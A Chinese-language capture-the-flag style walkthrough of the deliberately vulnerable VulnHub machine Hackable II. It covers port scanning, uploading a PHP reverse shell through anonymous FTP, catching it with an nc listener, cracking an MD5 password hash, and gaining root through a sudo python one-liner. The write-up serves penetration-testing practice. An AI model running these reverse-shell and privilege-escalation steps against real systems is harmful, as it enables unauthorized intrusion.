靶机介绍
下载地址:https://www.vulnhub.com/entry/hackable-ii,711/
难度:简单
渗透过程
ip地址扫描
我们通过设置桥接模式,能够用arp-scan搜索同一局域网中的活跃主机。这里,我们得到靶机的ip是192.168.1.106。
arp-scan -l
端口扫描
对靶机进行端口扫描,可以看到这里有三个端口:21,22,80。
nmap -A -T4 -p 1-65535 192.168.1.106
访问ftp
上图可以看到,ftp是允许匿名登录的。输入以下的命令,直接在名字那里输入anonymous,密码那里回车就可以登录,并且可以上传文件。我们可以上传一个php反弹shell脚本。
制作php反弹shell脚本
首先ifconfig查看自己的ip,我的是192.168.1.105。使用kali自带的脚本php-reverse-shell.php。修改一下ip,然后记住这个端口。
上传脚本
首先连接ftp,然后lcd命令切换到本地的脚本的路径。然后put命令把脚本上传上去。ls可以看到脚本成功上传。
ftp 192.168.1.106
lcd /home/kali/Downloads/
put php-reverse-shell.php
nc监听脚本中记录的端口
nc -lnvp 1234
访问脚本网站
这里有个插曲,其实我最先访问的是http,然后http打开之后长这样:
就是一个默认页面,没有什么信息。然后我查看了一下源代码,这里有一个提示:
于是,我用dirb扫描了一下这个网站的目录。这里我们可以看到一个file目录,这个就是我们的ftp文件上传的目录。
dirb http://192.168.1.106 -w /usr/share/dirb/wordlists/big.txt
获取shell
那么我们现在找到了这个网站,直接点击脚本就可以在nc端获取到shell。
提权
首先获取一个tty。
python3 -c 'import pty;pty.spawn("/bin/bash")'
- 在home目录下有一个important.txt,打开之后它提示我们运行一个脚本。我们根据提示运行这个脚本。
这里最后一行是一个shrek然后一串乱码。用MD5进行一个解密得到Shrek的密码。
- 登录Shrek账号。
我们就有权限查看/home/shrek目录下的user.txt文档,这个文档打开之后是一个企鹅以及一个领英的网址链接。
- 再找找有没有别的线索。
执行sudo -l,看到一个提示。这个命令是可以列出用户能以sudo方式执行的所有命令。这里提示用python3.5。
我们尝试一下让python返回一个bash。
sudo /usr/bin/python3.5 -c 'import os;os.system("/bin/sh")'
以上。